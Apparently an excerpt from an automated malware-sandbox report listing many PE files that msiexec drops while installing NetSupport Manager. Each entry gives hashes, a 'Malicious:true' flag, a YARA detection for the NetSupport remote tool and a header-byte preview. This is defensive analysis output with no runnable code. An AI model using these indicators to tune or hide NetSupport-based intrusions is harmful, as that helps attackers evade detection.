                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIEF23.tmp, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIF0BB.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF0BB.tmp, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIF10A.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF10A.tmp, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIF149.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF149.tmp, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIF179.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF179.tmp, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIF1A9.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF1A9.tmp, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIF1F8.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF1F8.tmp, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIF238.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF238.tmp, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIF2D5.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF2D5.tmp, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIF314.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF314.tmp, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIF373.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):763872
                                                                                      Entropy (8bit):6.574853256300612
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                      MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                      SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                      SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                      SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF373.tmp, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)..H.H.H.3.l..H..>j..H.0w..H.0g..H.H..>I..>^..H..>_..H..>o..H..>n..H..>i..H.Rich.H.................PE..L.....oe.................t........................@..........................0............@..........................c.......@..,....P..(Y...........J...]......Lo.. ...................................@...............\....=..@....................text....s.......t.................. ..`.rdata..t............x..............@..@.data...@....p...0...N..............@....rsrc...(Y...P...Z...~..............@..@.reloc...p.......r..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIF691.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF691.tmp, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIF6C1.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4973346
                                                                                      Entropy (8bit):6.51926002625642
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:SgAesgAelgAeHcqMOfhRTcqMOfWR6gAeAcqMOf3:SOsOlOE4h+4WkO/43
                                                                                      MD5:F93A3FB6A98D8E2A35977951AB36650C
                                                                                      SHA1:8B312DBC8A059C539F2FAC87A19212B13802BBB9
                                                                                      SHA-256:31F06B3C77ADC1A0C6356E670D0F2B06BE8DE2256497128D4ADC2933B9644E65
                                                                                      SHA-512:925BC858D59CD7205D27D49F9287A85371E4C72E171F3E2841CC00893265E5CD7F6462028975F52F2B8289FFA63D21F38CC9134ABDC144E976D15DFCACD1BA70
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF6C1.tmp, Author: Joe Security
                                                                                      Preview:...@IXOS.@.....@..vY.@.....@.....@.....@.....@.....@......&.{CBB68368-7767-4CFF-B3E5-211488346702}..NetSupport Manager..vrep.msi.@.....@.....@.....@......ARPPRODUCTICON.exe..&.{8FA17BDF-C6BA-4483-AA65-62957D834D73}.....@.....@.....@.....@.......@.....@.....@.......@......NetSupport Manager......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopDrivers....J...StopDrivers.@A.........MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rda

                                                                                      C:\Windows\Installer\MSIF710.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):250616
                                                                                      Entropy (8bit):6.25532114530443
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:JW17KIRjMhp0/dy1uKS8CEZv41XYZlhIz:hIRghpmE1uKS8NyVYZlhIz
                                                                                      MD5:C4CA339BC85AAE8999E4B101556239DD
                                                                                      SHA1:D090FC385E0002E35DB276960A360C67C4FC85CD
                                                                                      SHA-256:4AB23609CDC64D10B97C9CCB285ED7100F55D54D983CD50762DA25ECAC4357F9
                                                                                      SHA-512:9185EC32545FC838D7FEF6C9E4DD222DD02114C661B0B344F16287D55E6571BFE7A4233A852ACC579D07BCDBAB18C5C034C465B1F4BB78535ED51C3499087FE0
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|.../.../.../n$./.../=%./.../n$./.../n$./.../..L/.../..\/.../.../.../=%./.../=%./.../=%./.../..X/.../=%./.../Rich.../................PE..L.....Y...........!.....\...x......V........p.......................................H..............................PK......,=......................................................................`...@............p...............................text...MZ.......\.................. ..`.rdata.......p.......`..............@..@.data...4:...P.......>..............@....rsrc................X..............@..@.reloc...V.......X...^..............@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIF869.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF869.tmp, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIF8D7.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF8D7.tmp, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIF917.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF917.tmp, Author: Joe Security
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSIF985.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):763872
                                                                                      Entropy (8bit):6.574853256300612
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                      MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                      SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                      SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                      SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF985.tmp, Author: Joe Security
